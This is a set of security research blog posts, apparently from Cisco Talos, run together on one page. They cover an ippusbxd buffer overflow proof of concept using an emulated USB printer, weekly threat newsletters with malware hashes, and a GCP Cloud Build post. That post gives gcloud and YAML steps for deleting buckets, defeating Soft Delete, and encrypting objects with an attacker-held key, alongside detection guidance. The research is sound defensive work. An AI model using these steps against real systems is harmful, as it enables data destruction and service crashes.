By Aleksandar Nikolich
Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing

Monday, February 10, 2025 08:30

_By Aleksandar Nikolich_

Earlier this year, we conducted code audits of the macOS printing subsystem, which is heavily based on the open-source CUPS package. During this investigation, IPP-USB protocol caught our attention. IPP over USB specification defines how printers that are available over USB can only still support network printing via Internet Printing Protocol (IPP). After wrapping up the macOS investigation, we decided to take a look at how other operating systems handle the same functionality. 

Our target Linux system was running Ubuntu 22.04, a long-term support (LTS) release that handled IPP-USB via the “ippusbxd” package. This package is part of the OpenPrinting suite of printing tools that was under a lot of scrutiny recently due to several high severity vulnerabilities in different components. Publicity around these issues has caused undue stress on the OpenPrinting suite maintainers, so, although the potential vulnerability we are about to discuss is very real, mitigating circumstances make it less severe. The vulnerability is discovered and made unexploitable by modern compiler features, and we are highlighting this rare win. Additionally, the “ippusbxd” package is replaced by a safer “ipp-usb” solution, making exploitation of this vulnerability less likely.

**Discovering the vulnerability**

On Ubuntu-flavored Linux systems, when a new USB printer is plugged in, UDEV subsystem will invoke an IPP-USB handler to enable IPP-USB functionality. In Ubuntu 22.04, this is “ippusbxd” daemon, which handles communication with the printer, announces it to the network over DNS-SD, and makes it available on a network port. As this has a potential for an interesting attack surface, it piqued our interest.

The first step when getting familiar with a code base is to try to build it. While doing so, we were presented with the following message:

    In file included from /usr/include/string.h:495,
                     from ippusbxd-1.34/src/capabilities.c:9:
    In function ‘strncpy’,
        inlined from ‘get_format_paper’ at ippusbxd-1.34/src/capabilities.c:205:9:
    /usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: ‘__builtin___strncpy_chk’ 
                  specified bound depends on the length of the source argument [-Wstringop-overflow=]
      106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
          |          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ippusbxd-1.34/src/capabilities.c: In function ‘get_format_paper’:
    ippusbxd-1.34/src/capabilities.c:204:13: note: length computed here
      204 |         a = strlen(val) - strlen(tmp);
          |             ^~~~~~~~~~~
    In file included from /usr/include/string.h:495,
                     from ippusbxd-1.34/src/capabilities.c:9: 

Above is a compiler warning, enabled by “-Wstringop-overflow”, which performs lightweight static code analysis during compilation to catch common memory corruption issues. In this particular case, the compiler is telling us that there exists a potential vulnerability in the highlighted code. Essentially, compiler analysis has judged that a length argument to a “strncpy” call is based on the length of the source operand instead of the destination operand. This is a classic case of a stack-based buffer overflow involving the “strcpy” family of functions. 

To confirm that this is indeed a true positive finding, we looked at code context:

    char test1[255] = { 0 };
           char test2[255] = { 0 };
           char *tmp = strchr(val, '=');
           if (!tmp) continue;
           a = strlen(val) - strlen(tmp);           
           val+=(a + 1);
           tmp = strchr(val, ' ');
           if (!tmp) continue;
           a = strlen(val) - strlen(tmp);                                    
           strncpy(test2, val, a);                 

The above excerpt is in the part of the code that is trying to parse paper dimensions supported by the printer. Expected input would be:

    { x-dimension=1234 y-dimension=1234 }

Calls to “strlen” are used to calculate the length of the incoming numerical values, and the code can indeed result in a straightforward buffer overflow if the value specified in ”y-dimension” is longer than the buffer can hold.

Looking up the users of the offending code reveals that it’s only used during printer initialization, while interrogating printer capabilities:

    int
    ipp_request(ippPrinter *printer, int port)
    {
      http_t    *http = NULL; 
      ipp_t *request, *response = NULL;
      ipp_attribute_t *attr;
      char uri[1024];
      char buffer[1024];
      /* Try to connect to IPP server */
      if ((http = httpConnect2("127.0.0.1", port, NULL, AF_UNSPEC,
                   HTTP_ENCRYPTION_IF_REQUESTED, 1, 30000, NULL)) == NULL) {
        printf("Unable to connect to 127.0.0.1 on port %d.\n", port);
        return 1;
      }
      snprintf(uri, sizeof(uri), "http://127.0.0.1:%d/ipp/print", port);
      /* Fire a Get-Printer-Attributes request */
      request = ippNewRequest(IPP_OP_GET_PRINTER_ATTRIBUTES);
      ippAddString(request, IPP_TAG_OPERATION, IPP_TAG_URI, "printer-uri",
                     NULL, uri);
      response = cupsDoRequest(http, request, "/ipp/print");

In other words, this vulnerability would be triggered if a printer connected to a machine’s USB port reports supporting abnormally large media size

The compiler was right, this indeed constitutes a vulnerability. If exploited against a locked laptop, it could result in arbitrary code execution in a process with high privileges. 

**Developing a proof of concept**

To prove the existence and severity of this vulnerability, we need to develop a proof of concept (PoC) exploit. Since triggering this vulnerability technically requires a malicious printer being physically connected to the USB port, we have some work to do. 

An obvious route for implementing this is by using Linux USB Gadget API. The Linux USB Gadget API allows developers to create custom software-defined USB devices (i.e., gadgets). It enables device emulation, interface management, and communication protocol handling for virtual devices. In this scenario, an embedded Linux system acts as a USB device, instead of a USB host, and emulates desired functionality. Gadget drivers emulating an ethernet network interface or mass storage device are readily available in all Linux systems, and small single board computers can be used for this purpose. Among these, Raspberry Pi Zero fits all the requirements. 

Implementing a whole emulated USB printer would require significant effort, but PAPPL (a project related to OpenPrinting) already implements a featureful printer gadget that we can easily repurpose. A minimal modification to the source code is required to make the emulated printer report malicious media dimensions:

    diff --git a/pappl/printer-driver.c b/pappl/printer-driver.c
    index 10b7fda..b872865 100644
    --- a/pappl/printer-driver.c
    +++ b/pappl/printer-driver.c
    @@ -747,6 +747,7 @@ make_attrs(
           ippDelete(cvalues[i]);
       }
    +  ippAddString(attrs, IPP_TAG_PRINTER, IPP_CONST_TAG(IPP_TAG_KEYWORD), "media-size-supported",  NULL, getenv("EXPLOIT_STRING"));                      [5]
       // media-col-supported
       memcpy((void *)svalues, media_col, sizeof(media_col));
    diff --git a/testsuite/testpappl.c b/testsuite/testpappl.c
    index 460058d..7972cb6 100644
    --- a/testsuite/testpappl.c
    +++ b/testsuite/testpappl.c
    @@ -812,7 +812,7 @@ main(int  argc,                             // I - Number of command-line arguments
         }
         else
         {
    -      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;", device_uri);
    +      printer = papplPrinterCreate(system, /* printer_id */0, "Office Printer", "pwg_common-300dpi-600dpi-srgb_8", "MFG:PWG;MDL:Office Printer;CMD:pwg;", device_uri);         [4]
           papplPrinterSetContact(printer, &contact);
           papplPrinterSetDNSSDName(printer, "Office Printer");
           papplPrinterSetGeoLocation(printer, "geo:46.4707,-80.9961");

In the above code, we instruct the emulated printer to use contents of the “EXPLOIT_STRING” environment variable as its “media-size-supported” payload. 

To set up the trigger, we first set the \`EXPLOIT_STRING\` to contain our buffer overflow payload:

    export EXPLOIT_STRING=`perl -e 'print "{x=a y=" . "A"x600 . " }"'`

Above will report \`y\` dimension to have a series of 600 A characters--enough to overflow both stack buffers and cause a crash. 

Then, we run the following on our Raspberry Pi Zero device:

    testsuite/testpappl -U -c -1 -L debug -l - --usb-vendor-id 0xeaea --usb-product-id 0xeaea

The above command, using a utility from PAPPL suite, sets up an emulated USB printer device that will, when connected via USB to our target machine, deliver our buffer overflow payload. 

The next step is to simply connect the Raspberry Pi Zero device to the target and observe the effect:

    [520463.829183] usb 3-1: new high-speed USB device number 85 using xhci_hcd
    [520463.977791] usb 3-1: New USB device found, idVendor=eaea, idProduct=eaea, bcdDevice= 4.19
    [520463.977800] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
    [520463.977804] usb 3-1: Product: Office Printer
    [520463.977807] usb 3-1: Manufacturer: PWG
    [520463.977809] usb 3-1: SerialNumber: 0
    [520463.979354] usblp 3-1:1.0: usblp0: USB Bidirectional printer dev 85 if 0 alt 0 proto 2 vid 0xEAEA pid 0xEAEA
    [520464.014666] usblp0: removed
    [520464.020827] ippusbxd[647107]: segfault at 0 ip 00007f9886cd791d sp 00007ffe5965e558 error 4 in libc.so.6[7f9886b55000+195000]
    [520464.020839] Code: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 89 f8 48 89 fa c5 f9 ef c0 25 ff 0f 00 00 3d e0 0f 00 00 0f 87 23 01 00 00 <c5> fd 74 0f c5 fd d7 c1 85 c0 74 57 f3 0f bc c0 e9 2c 01 00 00 66

The above debug log shows that a segmentation fault has occurred in \`ippusbxd\` daemon as expected, signifying that we have successfully triggered this vulnerability.

**FORTIFY\_SOURCE**

However, closer inspection of the binary and the crash reveals the following:

    <-195299776>Note: TCP: sent 1833 bytes
    <-228919744>Note: Thread #2: No read in flight, starting a new one
    *** buffer overflow detected ***: terminated
    Thread 4 "ippusbxd" received signal SIGABRT, Aborted.
    [Switching to Thread 0x7ffff3dbe640 (LWP 649455)]
    __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
    44      ./nptl/pthread_kill.c: No such file or directory.
    (gdb) bt
    #0  __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:44
    #1  __pthread_kill_internal (signo=6, threadid=140737284662848) at ./nptl/pthread_kill.c:78
    #2  __GI___pthread_kill (threadid=140737284662848, signo=signo@entry=6) at ./nptl/pthread_kill.c:89
    #3  0x00007ffff7aea476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
    #4  0x00007ffff7ad07f3 in __GI_abort () at ./stdlib/abort.c:79
    #5  0x00007ffff7b31676 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7c8392e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
    #6  0x00007ffff7bde3aa in __GI___fortify_fail (msg=msg@entry=0x7ffff7c838d4 "buffer overflow detected") at ./debug/fortify_fail.c:26
    #7  0x00007ffff7bdcd26 in __GI___chk_fail () at ./debug/chk_fail.c:28
    #8  0x00007ffff7bdc769 in __strncpy_chk (s1=s1@entry=0x7ffff3dbd090 "", s2=s2@entry=0x7ffff3dbd5f7 'A' <repeats 200 times>..., n=n@entry=601, s1len=s1len@entry=255) at ./debug/strncpy_chk.c:26
    #9  0x000055555555f502 in strncpy (__len=601, __src=0x7ffff3dbd5f7 'A' <repeats 200 times>..., __dest=0x7ffff3dbd090 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:95
    #10 get_format_paper (val=0x7ffff3dbd5f7 'A' <repeats 200 times>..., val@entry=0x7ffff3dbd5f0 "{x=a y=", 'A' <repeats 193 times>...) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:220
    #11 0x000055555555fa62 in ipp_request (printer=printer@entry=0x7fffec000b70, port=<optimized out>) at ./ippusbxd_testing/ippusbxd-1.34/src/capabilities.c:297
    #12 0x000055555555d07c in dnssd_escl_register (data=0x5555555a77e0) at ./ippusbxd_testing/ippusbxd-1.34/src/dnssd.c:226
    #13 0x00007ffff7b3cac3 in start_thread (arg=<optimized out>) at ./nptl/pthread_create.c:442
    #14 0x00007ffff7bce660 in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

What caused the crash wasn’t directly the buffer overflow that overwrote stack content causing memory corruption. Nor was it stack smashing protection, a probabilistic mitigation that can be bypassed under certain conditions. In this case, the crash was caused by explicit program termination due to a detected condition for buffer overflow before it happened. This detection is the result of a compiler feature called “FORTIFY_SOURCE”, which replaces common error-prone functions with safer versions automatically. This means that the vulnerability is strongly mitigated and isn’t exploitable beyond causing a crash. 

**Conclusion**

We often hear of all the failings of software and vulnerabilities and mitigation bypasses, and we felt we should take this opportunity to highlight the opposite. In this case, modern compiler features, static analysis via -Wstringop-overflow and strong mitigation via FORTIFY_SOURCE, saved the day. These should always be enabled by default. Additionally, those compiler warnings are only useful if someone actually reads them. 

In this case, the impact of this vulnerability would be minor even if it were widely exploitable. The \`ippusbxd\` package development was abandoned in favor of a superior implementation via the “ipp-usb package implemented in a memory safe language that would prevent these sorts of issues from occurring in the first place. Developers readily point out that \`ippusbxd\` has been surpassed by \`ipp-usb\`, isn’t maintained, and isn’t used by any operating system. Ubuntu 22.04 being a long-term support version is an exception. Newer versions have switched to using \`ipp-usb\`.

Small praise for modern compilers - A case of Ubuntu printing vulnerability that wasn’t

Thorsten examines last year’s CVE list and compares it to recent Talos Incident Response trends. Plus, get all the details on the new vulnerabilities disclosed by Talos’ Vulnerability Research Team.

Thursday, February 6, 2025 14:03

> “Enough Ripples, And You Change The Tide. For The Future Is Never Truly Set.” X-Men: Days of Future Past

In January, I dedicated some time to examine threat data from 2024, comparing it with the previous years to identify anomalies, spikes, and changes.  

As anticipated, the number of Common Vulnerabilities and Exposures (CVEs) rose significantly, from 29,166 in 2023 to 40,289 in 2024, marking a substantial 38% increase. Interestingly, the severity levels of the CVEs remained centered around 7-8 for both years. 

When taking a closer look at the known exploited vulnerabilities reported by the Cybersecurity and Infrastructure Security Agency (CISA), I observed that the numbers remained relatively stable, with 186 in 2024 compared to 187 in 2023. However, there was a noteworthy 36% increase for the critical vulnerabilities scored (9-10).  

There is more to uncover from this data, and the analysis is still ongoing.  

It was also time to “stack” the data of our Quarterly Incident Response Reports. The standout aspects are the initial access vectors to me. "Exploiting Public Facing Applications" and "Valid Accounts" were dominant, outperforming other methods. This serves as a timely reminder to implement (proper) MFA and other identity and access control solutions as well as patch regularly and replace end-of-life assets. 

Reflecting on CVEs, patching, initial access vectors and also lateral movement, it's important to remember that the "free" support for Windows 10 will end on October 14, 2025.  

Mark.your.calendars. Please. And plan accordingly to ensure your systems remain secure.  

**The one big thing**

Cisco Talos’ Vulnerability Research team recently disclosed three vulnerabilities in Observium, three vulnerabilities in Offis, and four vulnerabilities in Whatsup Gold.   

**Why do I care?**

Observium and WhatsUp Gold can be categorized as Network Monitoring Systems (NMS). A NMS as such holds a lot of valuable information such as Network Topology, Device Inventory, Log Files, Configuration Data and more, making them an attractive for the bad guys. 

**So now what?**

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, make sure your installation is up to date. 

**Top security headlines of the week**

The Cybersecurity and Infrastructure Security Agency analyzed a patient monitor used by the Healthcare and Public Health sector and discovered an embedded backdoor. (CISA) 

Apple has released software updates to address several security flaws across its portfolio, including a zero-day vulnerability that it said has been exploited in the wild. (Hacker News) 

Nearly 100 journalists and other members of civil society using WhatsApp were targeted by a “zero-click” attack (Guardian) 

DeepSeek AI tools impersonated by infostealer malware on PyPI (Bleeping Computer) 

**Can't get enough Talos?**

*   Web shell frenzies, the first appearance of Interlock, and why hackers have the worst cybersecurity: IR Trends Q4 2024 
*   New TorNet backdoor seen in widespread campaign 

**Upcoming events where you can find Talos**

Talos team members: Martin LEE, Thorsten ROSENDAHL, Yuri KRAMARZ, Giannis TZIAKOURIS, and Vanja SVAJCER will be speaking at Cisco Live EMEA. Amsterdam, Netherlands, 9-14 February.   

S4x25 (February 10-12, 2025)  
Tampa, FL

RSA (April 28-May 1, 2025)  
San Francisco, CA

TIPS 2025 (May 14-15, 2025)  
Arlington, VA

**Most prevalent malware files from the week**

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 

MD5: 2915b3f8b703eb744fc54c81f4a9c67f 

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 

Typical Filename: VID001.exe 

Claimed Product: N/A 

Detection Name: Win.Worm.Coinminer::1201 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

MD5: 71fea034b422e4a17ebb06022532fdde 

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

Typical Filename: VID001.exe 

Claimed Product: n/a  

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA256:873ee789a177e59e7f82d3030896b1efdebe468c2dfa02e41ef94978aadf006f  

MD5: d86808f6e519b5ce79b83b99dfb9294d   

VirusTotal: 

https://www.virustotal.com/gui/file/873ee789a177e59e7f82d3030896b1efdebe468c2dfa02e41ef94978aadf006f 

Typical Filename: n/a  

Claimed Product: n/a   

Detection Name: Win32.Trojan-Stealer.Petef.FPSKK8   

SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   

MD5: ff1b6bb151cf9f671c929a4cbdb64d86   

VirusTotal: https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  

Typical Filename: endpoint.query   

Claimed Product: Endpoint-Collector   

Detection Name: W32.File.MalParent   

SHA 256: 744c5a6489370567fd8290f5ece7f2bff018f10d04ccf5b37b070e8ab99b3241 

MD5: a5e26a50bf48f2426b15b38e5894b189 

VirusTotal: https://www.virustotal.com/gui/file/744c5a6489370567fd8290f5ece7f2bff018f10d04ccf5b37b070e8ab99b3241 

Typical Filename: a5e26a50bf48f2426b15b38e5894b189.vir 

Claimed Product: N/A 

Detection Name: Win.Dropper.Generic::1201

Changing the tide: Reflections on threat data from 2024

A technical overview of Cisco Talos' investigations into Google Cloud Platform Cloud Build, and the threat surface posed by the storage permission family.

Thursday, February 6, 2025 06:00

**Background & Public Research**

Google Cloud Platform (GCP) Cloud Build is a Continuous Integration/Continuous Deployment (CI/CD) service offered by Google that is utilized to automate the building, testing and deployment of applications. Orca Security published an article describing certain aspects of the threat surface posed by this service, including a supply chain attack vector they have termed “Bad.Build”. One specific issue they identified, that Cloud Build pipelines with the default Service Account (SA) could be utilized to discover all other permissions assignments in a GCP project, was resolved by Google after Orca reported it. The general threat vector of utilizing Cloud Build pipelines to perform malicious actions, however, is still present. A threat actor with just the ability to submit and run a Cloud Build job (in other words, who has the _cloudbuild.builds.create_ permission) can execute any _gcloud_ GCP command line interface (CLI) command that the Cloud Build SA has the permissions to perform. A threat actor could perform these techniques either by obtaining credentials for a GCP user or SA (Mitre ATT&CK T1078.004) or by pushing or merging code into a repository with a Cloud Build pipeline configured (Mitre T1195.002). Orca Security focused on utilizing this threat vector to perform a supply chain attack by adding malicious code to a victim application in GCP Artifact Registry. Talos did not extensively examine this technique since Orca’s research was quite comprehensive, but confirmed it is still possible.

**Original Research**

Cisco Talos research detailed below focused on malicious actions enabled by the _storage.\*_ permission family, while the original Orca research detailed a supply chain attack scenario enabled by the _artifactregistry.\*_ permissions. Beyond the risk posed by the default permissions, any additional permissions assigned to the Cloud Build SA could potentially be leveraged by a threat actor with access to this execution vector, which is an area for potential future research. While Orca mentioned that a Cloud Build job could be triggered by a merge event in a code repository, in their article they utilized the _gcloud_ Command Line Interface (CLI) tool to trigger the malicious build jobs they performed. Talos meanwhile utilized commits to a GitHub repository configured to trigger a Cloud Build job, since this is a form of Initial Access vector that would allow a threat actor to target GCP accounts without access to an identity principal for the GCP account.

Unlike the Orca Security findings, Talos does not assess that the attack path illustrated in the following research represents a vulnerability or badly architected service. There are legitimate business use cases for every capability and default permission that we utilized for malicious intent, and Google has provided robust security recommendations and defaults. This research, instead, should be taken as an instructive illustration of the risks posed by these capabilities for cloud administrators who may be able to limit some of the features that were misused if they are not needed in a particular account. It can also be a guide for security analysts and investigators who can monitor the Operations Log events identified, threat hunt for their misuse, or identify them in a post-incident incident response workflow.

**Defensive Recommendations Summary**

Talos recommends creating an anomaly model-style threat detection for the default Cloud Build SA performing actions that are not standard for it to execute in a specific environment. As always, properly applying the principle of least privilege by assigning Cloud Build a lower privileged Service Account with just the permissions needed in a particular environment will also reduce the threat surface identified here. Finally, review the configuration applied to any repositories that can trigger Cloud Build or other CI/CD service jobs, require manual approval for builds triggered by Pull Requests (PRs) and avoid allowing anyone to directly commit code to GitHub repositories without a PR. More details on all three of these topics are described below.

**Lab Environment Setup**

Talos has an existing Google Cloud Platform lab environment utilized for offensive security research. Within that environment, a Cloud Storage bucket was created and the Cloud Build Application Programming Interface (API) were enabled. Additionally, a target GitHub repository was created; For research purposes, this repository was set to private, but an actual adversary would likely take advantage of a public repository in most cases. The Secrets Manager API is also needed for Cloud Build to integrate with GitHub, so that was also enabled. These actions can be performed using the _gcloud_ and GitHub _gh_ CLI tools using the following commands:

    gcloud storage buckets create BUCKET_NAME --location=LOCATION --project=PROJECT_ID
    gcloud services enable cloudbuild.googleapis.com --project=PROJECT_ID\
    gcloud services enable secretmanager.googleapis.com --project=PROJECT_ID
    gh repo create REPO_NAME --private --description "Your repository description"
    

Next, to simulate a real storage bucket populated with data, a small shell script was executed that created 100 text files containing random data and transferred them to the new Cloud Storage bucket.

    #!/bin/bash
    # Set your bucket name here
    BUCKET_NAME="data-destruction-research"
    # Create a directory for the files
    mkdir -p random_data_files
    # Generate 500 files with 10MB of random data
    for i in {1..100}
    do
        FILE_NAME="random_data_files/file_$i.txt"
        # Use /dev/urandom to generate random data and `head` to limit to 10MB
        head -c $((10*1024*1024)) </dev/urandom > "$FILE_NAME"
        echo "Generated $FILE_NAME"
    done
    # Upload the files to the GCP bucket
    for FILE in random_data_files/*
    do
        gsutil cp "$FILE" "gs://$BUCKET_NAME/"
        echo "Uploaded $FILE to gs://$BUCKET_NAME/"
    done
    

Then the GitHub repository and Cloud Build were integrated by creating a connection between the two resources, which can be done using the following command, followed by authenticating and granting access on the GitHub.com side.

    gcloud builds connections create github CONNECTION_NAME --region=REGION

Finally, a Cloud Build “trigger” that starts a build when code is pushed to the main branch, a pull request (PR) is created, or code is committed to an existing pull request in the victim GitHub repository, was configured. This can be done using the following _gcloud_ command:

    gcloud builds triggers create github \
      --name=TRIGGER_NAME \
      --repository=projects/PROJECT_ID/locations/us-west1/connections/data-destruction/repositories/REPO_NAME \
      --branch-pattern=BRANCH_PATTERN # or --tag-pattern=TAG_PATTERN \
      --build-config=BUILD_CONFIG_FILE \
      --region=us-west1
    

**Defensive Notes**

Google’s documentation warns users that it is recommended to require manual approval to trigger a build if utilizing the creation of a PR or a commit to a PR as a trigger condition, since any user that can read a repo can submit a PR. This is excellent advice that should be followed whenever possible, and reviewers should be made aware of the threat surface posed by Cloud Build. For the purpose of illustrating the potential threat vector here, this advice was not heeded and manual approval was not setup in the Talos lab environment. Builds can also be triggered based on a PR being merged into the main branch, which is another reason besides protecting the integrity of the repository that an approving PR review should be required before PRs are merged.

There may be real world scenarios where a valid business case exists to allow automatic build events when a PR is created, which is why a proper defense in depth strategy should include monitoring the events performed by any Service Accounts assigned to Cloud Build. Google also offers the ability to require a comment containing the string “/gcbrun” from either just a user with the GitHub repository owner or collaborator roles or any contributor to be made on a PR to trigger the Cloud Build run. This is another strong security feature that should be configured with the owner or collaborator option selected if possible. If performing a penetration test or red teaming engagement and attempting to target GCP via a GitHub PR, it may be worth commenting that string on your malicious PR in case the Cloud Build trigger is configured to allow any contributor this privilege.

**Research & Recommendations****Data Destruction (Mitre ATT&CK T1485)**

Talos has previously covered data destruction for impact within GCP Cloud Storage during the course of a Purple Teaming Engagement focused on GCP, but expanded upon this research and utilized the GitHub-to-Cloud Build execution path in this research. The first specific behavior performed, deleting a Cloud Storage bucket, can be performed using the following _gcloud_ command:

    gcloud storage rm --recursive gs://BUCKET_NAME

To perform this via a Cloud Build pipeline, Orca’s simple Proof of Concept (PoC) example Cloud Build configuration file, itself in turn based on the example in Google’s documentation, was modified slightly as follows:

    - name: 'gcr.io/cloud-builders/gcloud'
      args: ['storage', 'rm', '--recursive', 'gs://BUCKET_NAME']
    

This YAML file was then committed to a GitHub branch and a PR was created for it, which can be done utilizing the following commands:

    git clone <repo URL>
    cd <repo name>
    cp ../totally-not-data-destruction.yaml cloudbuild.yaml
    git add cloudbuild.yaml
    git commit -m "Not going to do anything bad at all"
    git push
    gh pr create
    

In the Orca Security research, a Google Cloud Storage (GCS) bucket for the Cloud Build runtime logs is required. Since threat actors typically wish to avoid leaving forensic artifacts behind, they may choose to specify a GCS bucket in a different GCP account under their control. This provides a detection opportunity by looking for the utilization of an external GCS bucket in a Cloud Build event, assuming all the storage buckets in the account are known. However, when running a Cloud Build job via a GitHub or other repository trigger, specifying a GCS bucket for storing logs is not required.

GCP offers the ability to configure “Soft Delete”, a feature that enables the restoration of accidentally or maliciously deleted GCS buckets and objects for a configurable time period. This is a strong security feature and should be enabled whenever possible. However, as is noted in their official documentation, when a bucket is deleted, its name becomes available for use again and if claimed during the creation of a new bucket, it will no longer by possible to restore the deleted GCS bucket. To truly destroy data in a GCS bucket, an adversary therefore just needs to immediately create a new bucket with the same name after deleting the previous one.

The Cloud Build configuration file can be updated to accomplish this as follows:

    steps:
    - name: 'gcr.io/cloud-builders/gcloud'
      args: ['storage', 'rm', '--recursive', 'gs://BUCKET_NAME']
      args: ['storage', 'buckets', 'create', 'gs://BUCKET_NAME', '--location=BUCKET_LOCATION']
    

**Defensive Notes****Log Events**

All of the events discussed above are logged by Google Operations Logs. The following Operations Logs events were identified during the research:

*   _google.devtools.cloudbuild.v1.CloudBuild.RunBuildTrigger_
    *   This event logs the creation of a new build via a connection trigger, such as the GitHub Pull Request trigger method discussed above. This will be very useful for a Digital Forensics & Incident Response (DFIR) investigator as part of an investigation, but is unlikely to be a good basis for a threat detection.
*   _google.devtools.cloudbuild.v1.CloudBuild.CreateBuild_
    *   This event logs the manual creation of a new build, and indicates what identity principal triggered the event. If the build was manually triggered and has a GCS bucket specified as a destination for build logs, that bucket’s name will be specified in the field _protoPayload.request.build.logsBucket="gs://gcb\_testing"._ If this field is present, a threat detection or threat hunting query for unknown buckets outside known infrastructure may be of use. Additionally, like with most cloud audit log events, significant quantities of failed _CreateBuild_ events followed by a successful event may be indicative of an adversary attempting to discover new capabilities or escalate privileges Otherwise, since this is a perfectly legitimate event, like _RunBuildTrigger_ it will primarily be of use for DFiR investigations rather than threat detections.
*   _storage.buckets.delete_
    *   An event with this methodName value logs the deletion of a GCS bucket. It is automatically of interest during the course of a DFIR investigation that involves data destruction, and may be worth threat hunting for if the value of the _protoPayload.authenticationInfo.principalEmail_ is the default Cloud Build Service Account. This is not automatically worthy of a threat detection, as it can be legitimate for Cloud Build to use a GCS bucket to store temporary data and delete it after the build is complete, but it is likely a good candidate for an anomaly model detection.
*   _storage.buckets.create_
    *   While relatively uninteresting in isolation, if this event shortly follows a _storage.buckets.delete_ event it may be indicative of an attempt to bypass the protections offered by Safe Delete, as described above. This may be automatically detection worthy, and would definitely be a useful threat hunting or DFIR investigation query.

**Data Encrypted for Impact (Mitre ATT&CK T1486)**

Cloud object storage is not inherently immune from ransomware, but despite the concerns of a potential for “ransomcloud” attacks and other similar threat vectors, it is actually quite difficult to irreversibly encrypt objects in a cloud storage bucket. It is much more likely that a data-focused cloud impact attack will involve exfiltrating the objects and deleting them before offering them back in exchange for a ransom, rather than encrypting them. In Google Cloud Storage, all objects are encrypted by default using a Google-managed encryption key, but GCS also supports three other methods of encrypting objects. These methods are server side encryption using the Cloud Key Management Service (CKMS) to manage the keys, also known as customer-managed encryption, server side encryption using a customer provided key not stored in the cloud account at all, and client side encryption of the objects. With customer-managed encryption, if an adversary implements this approach, the legitimate owner of the objects will have access to the CKMS and be able to decrypt them. With either a customer provided encryption key or client side encryption, a customer may be able to overwrite the original versions of the objects, though if the bucket has Object Versioning enabled, an administrator can simply revert to a previous version of the object to retrieve it.

If an adversary is able to identify a bucket that does not have Object Versioning configured, they may be able to utilize the Cloud Build attack vector described previously to encrypt existing objects with a customer provided key that they control. This is possible using the following gcloud CLI command:

    gcloud storage cp SOURCE_DATA gs://BUCKET_NAME/OBJECT_NAME --encryption-key=YOUR_ENCRYPTION_KEY

And was performed by updating the previously described cloudbuild.yaml file with entries for 10 objects in the bucket, then triggering another build. In an actual attack, enumeration of the stored objects followed by encryption of all of them would be required.

**Defensive Notes**

The creation of the new encrypted file was logged with an event of type _storage.objects.create,_ but unfortunately there was no indication that a customer-provided encryption key was utilized for encryption in the event’s body. Therefore there was nothing especially anomalous about the event for a detection or investigator to look for. This whole attack vector though can again be obviated by enabling Object Versioning and Soft Delete, so that is highly recommended.

Google Cloud Platform Data Destruction via Cloud Build

Martin discusses how defenders can use threat intelligence to equip themselves against AI-based threats. Plus check out his introductory course to threat intelligence.

Thursday, January 30, 2025 14:05

Welcome to this week’s edition of the Threat Source newsletter. 

You don’t need me to tell you that security is constantly changing and that more change is on its way. The enthusiastic adoption of new AI systems will inevitably lead to more demands on cybersecurity teams. Not only will these systems need protecting against the same threats which affect current systems, but also against new types of threats that target AI models. We can only expect that attacks designed to subvert AI models and get them to function in ways detrimental to their operators’ interests will become more effective and beneficial to attackers over time. 

The good news is that we can expect AI enabled security systems to help protect against attacks, detect incursions, and orchestrate the remediation of affected systems. However, we must not overlook the fact that people will remain involved and invested in the outcome. Within this AI powered future will be CISOs who will be held responsible for the security of systems. There will also be many analysts tasked with keeping systems operating correctly while trying to anticipate and protect against forthcoming malicious campaigns.

Although we may not be able to predict the nature of attacks in this distant future, we can predict some of the skills that will be necessary to beat these attacks. Threat intelligence skills will be vital to equip future cyber security professionals not only to understand the goals of the threat actors that they face but to situate their attacks within the context of these goals. Armed with this understanding, security teams will be able to make better decisions regarding the allocation and prioritization of resources to best defend against attacks. 

Developing threat intelligence skills within the cyber security professionals of tomorrow begins today. Training up people who are early in their careers and students yet to begin their careers is one of the best investments we can make to build resilience against future threats.

To help skill up future analysts, my colleagues and myself in collaboration with Cisco’s Networking Academy have developed an introductory course to threat intelligence. This course is free for all, only registration is required, and is intended to give an overview of the domain for someone without prior knowledge which can be used as a starting point for further study or employment.

For those looking to develop a threat intelligence program as part of their cyber security strategy, we are hosting a technical seminar at Cisco Live EMEA on Sunday February 9th. The session, “Establishing a Threat Intelligence Program, Why its Necessary, What to Expect and How to Go about it \[TECSEC-2003\]”, will present how managers can set-up a threat intelligence team as part of their arsenal against the bad guys and what can reasonably be expected.

**The one big thing**

